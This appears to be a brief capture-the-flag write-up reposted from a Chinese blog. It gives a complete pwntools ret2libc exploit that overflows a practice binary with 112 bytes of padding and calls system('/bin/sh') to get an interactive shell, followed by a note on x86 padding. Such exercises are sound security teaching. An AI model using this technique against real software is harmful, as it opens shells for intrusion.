ret2libc 1

exp

from pwn import *

p = process('./ret2libc1')
elf = ELF('./ret2libc1')

system_plt = elf.plt["system"]
bin_sh = next(elf.search(b"/bin/sh"))

payload = b'A'*112 + p32(system_plt) + b'A'*4 + p32(bin_sh)

p.recvline()
p.sendline(payload)
p.interactive()

其中示例图中的exit函数在实际利用的时候不需要，所以直接根据86架构填充4个字节即可

标签：bin,plt,elf,system,payload,sh,ret2libc
来源： https://www.cnblogs.com/murkuo/p/15965413.html